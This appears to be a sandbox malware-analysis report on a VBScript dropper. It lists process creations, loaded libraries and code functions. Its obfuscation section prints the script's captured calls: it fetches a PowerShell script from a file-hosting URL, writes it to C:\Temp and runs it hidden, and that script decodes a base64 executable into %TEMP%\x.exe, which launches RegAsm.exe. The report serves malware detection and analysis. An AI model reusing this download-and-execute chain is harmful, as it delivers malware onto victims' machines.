            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3D34C6_2_02F3D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFF0CC6_2_02FFF0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F570C06_2_02F570C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0301B16B6_2_0301B16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030101AA6_2_030101AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030081CC6_2_030081CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5B1B06_2_02F5B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F3F1726_2_02F3F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F8516C6_2_02F8516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FD81586_2_02FD8158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300F0E06_2_0300F0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FEA1186_2_02FEA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030070E96_2_030070E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F401006_2_02F40100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6C6E06_2_02F6C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300F7B06_2_0300F7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4C7C06_2_02F4C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F507706_2_02F50770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F747506_2_02F74750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030016CC6_2_030016CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFE4F66_2_02FFE4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030075716_2_03007571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030105916_2_03010591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F414606_2_02F41460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300F43F6_2_0300F43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_030024466_2_03002446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FED5B06_2_02FED5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F505356_2_02F50535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FFDAC66_2_02FFDAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300AB406_2_0300AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FEDAAC6_2_02FEDAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F95AA06_2_02F95AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4EA806_2_02F4EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300FB766_2_0300FB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC3A6C6_2_02FC3A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03006BD76_2_03006BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F8DBF96_2_02F8DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC5BF06_2_02FC5BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03007A466_2_03007A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300FA496_2_0300FA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6FB806_2_02F6FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F7E8F06_2_02F7E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F538E06_2_02F538E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F368B86_2_02F368B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0301A9A66_2_0301A9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F528406_2_02F52840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5A8406_2_02F5A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBD8006_2_02FBD800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F529A06_2_02F529A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F669626_2_02F66962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F599506_2_02F59950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6B9506_2_02F6B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300FF096_2_0300FF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F59EB06_2_02F59EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F62E906_2_02F62E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50E596_2_02F50E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300FFB16_2_0300FFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5CFE06_2_02F5CFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300EE266_2_0300EE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F42FC86_2_02F42FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F51F926_2_02F51F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300CE936_2_0300CE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC4F406_2_02FC4F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F70F306_2_02F70F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F92F286_2_02F92F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300EEDB6_2_0300EEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F40CF26_2_02F40CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FF0CB56_2_02FF0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03001D5A6_2_03001D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_03007D736_2_03007D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FC9C326_2_02FC9C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F50C006_2_02F50C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F4ADE06_2_02F4ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F6FDC06_2_02F6FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F68DBF6_2_02F68DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F53D406_2_02F53D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0300FCF26_2_0300FCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F5AD006_2_02F5AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02FBEA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F97E54 appears 91 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F3B970 appears 268 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02FCF290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F85130 appears 36 times
            Source: scan file.Vbs.vbsInitial sample: Strings found which are bigger than 50
            Source: Process Memory Space: powershell.exe PID: 4280, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: x.exe.3.drStatic PE information: Section: ShS!} ZLIB complexity 1.0003332189611487
            Source: classification engineClassification label: mal100.spre.troj.expl.evad.winVBS@8/7@1/1
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\qrz18p[1].ps1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
            Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\dddddd.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan file.Vbs.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan file.Vbs.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("C:\Temp\dddddd.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IFileSystem3.FolderExists("C:\Temp");IFileSystem3.CreateFolder("C:\Temp");IServerXMLHTTPRequest2.open("GET", "https://files.catbox.moe/qrz18p.ps1", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();IFileSystem3.FileExists("C:\Temp\dddddd.ps1");IFileSystem3.CreateTextFile("C:\Temp\dddddd.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IWshShell3.Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"", "0")
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAG
            Source: x.exe.3.drStatic PE information: 0x9E568F69 [Sat Mar 7 05:08:57 2054 UTC]
            Source: x.exe.3.drStatic PE information: section name: ShS!}
            Source: x.exe.3.drStatic PE information: section name:
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4ACF00BD pushad ; iretd 3_2_00007FFB4ACF00C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004178BF pushfd ; retf 6_2_004178C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004033A0 push eax; ret 6_2_004033A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00404C69 push eax; ret 6_2_00404C6A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040D4E8 push eax; iretd 6_2_0040D4E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00404DE5 push 00000071h; retf 6_2_00404DFD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00418F6A push esp; retf 6_2_00418F6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00411717 push esi; ret 6_2_00411731
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00411723 push esi; ret 6_2_00411731
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00418FA6 push esp; retf 6_2_00418F6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02F409AD push ecx; mov dword ptr [esp], ecx6_2_02F409B6
            Source: x.exe.3.drStatic PE information: section name: ShS!} entropy: 7.999378505539443
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
